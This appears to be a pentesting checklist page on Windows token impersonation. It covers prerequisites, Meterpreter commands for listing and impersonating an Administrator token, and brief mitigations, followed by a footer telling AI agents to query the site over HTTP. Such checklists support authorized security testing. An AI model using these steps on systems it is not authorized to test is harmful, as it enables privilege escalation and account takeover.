# Token Impersonation Attack ### Overview **Token impersonation** is a Windows privilege escalation technique where an attacker abuses **access tokens** belonging to another user or service to execute actions as that identity **without knowing their password**. If a high-privileged user (e.g., Administrator or SYSTEM) logs into a system, their token may remain available in memory. An attacker with sufficient privileges can **steal or impersonate this token**, effectively becoming that user. ### Prerequisites 1. Local administrative privileges are required to enumerate and manipulate tokens. 2. A privileged user or service must be logged in. 3. Impersonation privileges enabled: `SeImpersonatePrivilege` OR `SeAssignPrimaryTokenPrivilege` ### Steps 1. Obtain Local Admin or SYSTEM Access 2. Enumerate Available Tokens ```bash # Meterpreter commands getuid list_tokens -u ``` 3. Impersonate the Token ```bash # Meterpreter commands impersonate_token "DOMAIN\\Administrator" getuid ``` 4. Execute Commands as the Impersonated User ```bash # Meterpreter shell and then the command within the shell shell whoami ``` ### Mitigations 1. Restrict Impersonation Privileges 2. Limit Local Admin Access 3. Monitor Token Abuse --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/token-impersonation-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.